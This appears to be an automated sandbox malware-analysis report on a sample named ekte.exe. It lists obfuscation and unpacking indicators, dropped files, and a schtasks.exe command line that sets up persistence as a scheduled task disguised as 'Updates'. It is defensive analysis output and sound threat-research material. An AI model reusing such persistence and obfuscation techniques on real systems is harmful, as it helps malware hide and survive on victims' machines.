            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs.Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs.Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs.Net Code: hUZwcMcIwb System.Reflection.Assembly.Load(byte[])
            Source: sqlite3.dll.19.drStatic PE information: section name: /4
            Source: sqlite3.dll.19.drStatic PE information: section name: /19
            Source: sqlite3.dll.19.drStatic PE information: section name: /31
            Source: sqlite3.dll.19.drStatic PE information: section name: /45
            Source: sqlite3.dll.19.drStatic PE information: section name: /57
            Source: sqlite3.dll.19.drStatic PE information: section name: /70
            Source: sqlite3.dll.19.drStatic PE information: section name: /81
            Source: sqlite3.dll.19.drStatic PE information: section name: /92
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00402145 pushad ; retf 8_2_00402170
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0041423E push ebp; retf 8_2_0041423F
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004032E0 push eax; ret 8_2_004032E2
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_004142F0 pushad ; iretd 8_2_004142F3
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_0041163E push cs; retf 8_2_0041164B
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009BDFA1 push ecx; ret 8_2_009BDFB4
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeCode function: 18_2_0042D8CA pushad ; ret 18_2_0042D8CB
            Source: ekte.exeStatic PE information: section name: .text entropy: 7.8327880515520985
            Source: eFDiSxeTfjUqTk.exe.0.drStatic PE information: section name: .text entropy: 7.8327880515520985
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, IllM6A3aZOPcMgXjOU.csHigh entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bjGcTBS7eYkmH0ESo8.csHigh entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, LbhCp6bqvsHPITEbbd.csHigh entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, EBF8HKpg2H8gNx5JlU.csHigh entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.csHigh entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, FBLsfKKwpF9k583lKwM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, vt8cqPvll0puwSpjTi.csHigh entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, bWcZ41KMwu9OHEiK6Qt.csHigh entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, nNTYENVbpVNaaaQZwt.csHigh entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, UkVUKC2jEai4CGi2Se.csHigh entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, PJcM4TPF3FkembsOYq.csHigh entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, wyR6uyonrymvyqkOh2.csHigh entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, WBNVGjz7eRqJ47EZn1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, K1rZtSUuKDiT2gXLO3.csHigh entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, m6ldtHNLsJmcXYbkiX.csHigh entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, rrydSlZNZ76wCXitSf.csHigh entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, DSJdqD9Y86mwaZScjh.csHigh entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.csHigh entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, iE2YC2sTBAG7vR9RqE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
            Source: 0.2.ekte.exe.67b0000.6.raw.unpack, zpJ0IIOQqJJKMuU1Tp.csHigh entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, IllM6A3aZOPcMgXjOU.csHigh entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bjGcTBS7eYkmH0ESo8.csHigh entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, LbhCp6bqvsHPITEbbd.csHigh entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, EBF8HKpg2H8gNx5JlU.csHigh entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.csHigh entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, FBLsfKKwpF9k583lKwM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, vt8cqPvll0puwSpjTi.csHigh entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, bWcZ41KMwu9OHEiK6Qt.csHigh entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, nNTYENVbpVNaaaQZwt.csHigh entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, UkVUKC2jEai4CGi2Se.csHigh entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, PJcM4TPF3FkembsOYq.csHigh entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, wyR6uyonrymvyqkOh2.csHigh entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, WBNVGjz7eRqJ47EZn1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, K1rZtSUuKDiT2gXLO3.csHigh entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, m6ldtHNLsJmcXYbkiX.csHigh entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, rrydSlZNZ76wCXitSf.csHigh entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, DSJdqD9Y86mwaZScjh.csHigh entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.csHigh entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, iE2YC2sTBAG7vR9RqE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
            Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, zpJ0IIOQqJJKMuU1Tp.csHigh entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, IllM6A3aZOPcMgXjOU.csHigh entropy of concatenated method names: 'jSlcLa87B', 'TdRALONGV', 'mtkQEMfTh', 'wb4OAHLWm', 'JOhmYuIcS', 'Kmvooa3Hi', 'cv8sHmy1Hg981deDfH', 'H9VwdmNVZClunmE9Dp', 'PyiuDJoJm', 'l08iHvQbZ'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bjGcTBS7eYkmH0ESo8.csHigh entropy of concatenated method names: 'Fkv2f8U1y4', 'deM2DMDSC4', 'dpo2U7FElf', 'bjC2vgtX5S', 'zkb2gx7YIK', 'GaFUHmMC8E', 'N2JU0mfvbB', 'dsDUhgjaBP', 'RyhUrjM7aN', 'gjtUJ0qJcc'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, LbhCp6bqvsHPITEbbd.csHigh entropy of concatenated method names: 'AEqFvf8avx', 'JquFgalxFC', 'ShMF8EfTJW', 'NvtFGlxbwF', 'jfiFY4XaQ9', 'KasFdDiygr', 'XpGKYKDa2JhpumvAZO', 'YNKSAU0XIZcxjtUWL4', 'SYAFFQlDJt', 'XciFndJota'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, EBF8HKpg2H8gNx5JlU.csHigh entropy of concatenated method names: 'kuduTnCpaA', 'oNHu7ZsRvs', 'yLZu4FmcaM', 'P5FusCNICY', 'EHquPfQjNY', 'VYeulZSwms', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.csHigh entropy of concatenated method names: 'WAOnfkTXWQ', 'HaXn3X1XqF', 'cMOnDFb6EL', 'uQBnWoYK46', 'EInnUYO2x7', 'jTsn2oivgy', 'rRNnv1R3at', 'gtlngdH8mZ', 'DsinETOmhj', 'UXon8YPoAP'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, FBLsfKKwpF9k583lKwM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jvCiP0JVX6', 'dlmijAtZB8', 'y5Yi1S6rxK', 'IAcibWobmZ', 'eSgiHnQLyT', 'Pi6i0Y7FqI', 'NtNihFSYDR'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, vt8cqPvll0puwSpjTi.csHigh entropy of concatenated method names: 'OQlUeuGnZJ', 'qbGUOOhq1P', 'zgcW4cVR2C', 'LJ6Wst1q3n', 'zikWloXLFg', 'GY8WVvybMG', 'Q4UW6NpPEf', 'QduWqUPCaG', 'HoFWRFZKEN', 'oVbWtuiO7m'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, bWcZ41KMwu9OHEiK6Qt.csHigh entropy of concatenated method names: 'I5pxB2Jpee', 'c1QxI5hfLV', 'BAQxc8Pf1f', 'wZhxAHammN', 'MAKxeOCLCx', 'YYrxQxKrtQ', 'GYlxOysBpq', 'by4xKHIjJ0', 'FA0xmuoH4H', 'Yabxo5D8Hs'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, nNTYENVbpVNaaaQZwt.csHigh entropy of concatenated method names: 'jTaMrxhNBP', 'TxvMkHUmkq', 'sP3uCfHUt9', 'RGuuFmgYVm', 'wqEM9mNoPB', 'EYPMys8pip', 'UaCMa6iQhV', 'WnxMPDdRSI', 'YJ6MjAAv2U', 'bDnM101eL9'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, UkVUKC2jEai4CGi2Se.csHigh entropy of concatenated method names: 'eiyu3FjGhI', 'tTFuDHsqEl', 'PM3uW39cda', 'mcDuUOAHOi', 'YVDu2cnkbC', 'SrMuvNDiWP', 'DakugXqRdq', 'A6guEmURuU', 'q6Bu8SQ6ph', 'CRGuGP14A3'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, PJcM4TPF3FkembsOYq.csHigh entropy of concatenated method names: 'gdULKPg2yr', 'RAWLmhBmHY', 'W05LTGm6m3', 'b45L72HaSh', 'tXyLsS0OYd', 'IwXLlfXJGs', 'h1QL6qrs1t', 'n1SLqQ50uh', 'QatLtDGTpi', 'Lx8L9EEWDP'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, wyR6uyonrymvyqkOh2.csHigh entropy of concatenated method names: 'mCpxFpAdOS', 'bvGxnMkGZU', 'HJuxwLpukg', 'YCZx3bmXn6', 'l9LxDervei', 'DoaxUXiiTd', 'XPNx2WjFmT', 'Nv3uh3hvsm', 'TRnurlndua', 'XkGuJ6uing'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, WBNVGjz7eRqJ47EZn1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HDLxL7YSy1', 'FNVxY5VlNG', 'yLhxduEAZs', 'n99xMOk3Ya', 'eIRxuOAGyc', 'qiLxxY0PH0', 'iGvxiIAP5w'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, K1rZtSUuKDiT2gXLO3.csHigh entropy of concatenated method names: 'ssYvB5XHg5', 'VNtvIjqiwA', 'PrMvcZrpGG', 'vDFvAHkrJg', 'ur5veQa5t8', 'x9FvQfTBC4', 'sCMvOQN9hY', 'EjAvKPL0ys', 'QdFvm4PqgM', 'yVqvoV1Jec'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, m6ldtHNLsJmcXYbkiX.csHigh entropy of concatenated method names: 'Dispose', 'fQVFJ8dGkf', 'UHES7ejg23', 'mXiZZ6pJiP', 'S9kFkwsVcb', 'VWLFzxmqvY', 'ProcessDialogKey', 'IGRSCenDpA', 'reASF7aKaW', 'mDGSSICd16'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, rrydSlZNZ76wCXitSf.csHigh entropy of concatenated method names: 'sv4WAc4dmQ', 'E0QWQZpVMP', 'UVRWK6KQ3g', 'Dl4Wm7WEJl', 'rN5WYWVT0y', 'XTvWdIVjuV', 'D8VWMSxxXn', 'g6tWujZ1lC', 'l7ZWxCkRM9', 'GfxWi7nOpb'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, DSJdqD9Y86mwaZScjh.csHigh entropy of concatenated method names: 'ToString', 'qOid9RD95D', 'qK9d7ZG9N5', 'hP8d44DQ3j', 'g5rdskVpQ2', 'nqIdlpwXSm', 'y8xdV3c4RE', 'NiSd6bW6Zg', 'WnAdqjmJqd', 'Q2RdReb9Y9'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.csHigh entropy of concatenated method names: 's2BDPyb9Et', 'lTTDjXKrC6', 'xguD17ZWKw', 'DaXDbQIVvy', 'TSgDHHe08s', 'Sv9D04vVT5', 'JF4DhcvkbM', 'b2LDrTTerH', 'hcIDJi9fMo', 'rIiDkYcp5E'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, iE2YC2sTBAG7vR9RqE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ApSSJU7Tgm', 'zlgSkxDVqP', 'UxqSzPJtjK', 'CFHnCiSiGy', 'W77nFjSnoR', 'fEonSVVPNI', 'EbDnnZGtYZ', 'zmJiutxqq2f8vwyejYr'
            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, zpJ0IIOQqJJKMuU1Tp.csHigh entropy of concatenated method names: 'WAWv3wGXOX', 'FyDvWfVGtj', 'THZv2un6jB', 'lR12khhNlA', 'yaD2zMMUiW', 'Lf7vCprcr1', 'JF6vF9qB5A', 'yGXvSqn1sA', 'JkSvnVLTXM', 'RXQvwrKTGy'
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\ekte.exeFile created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
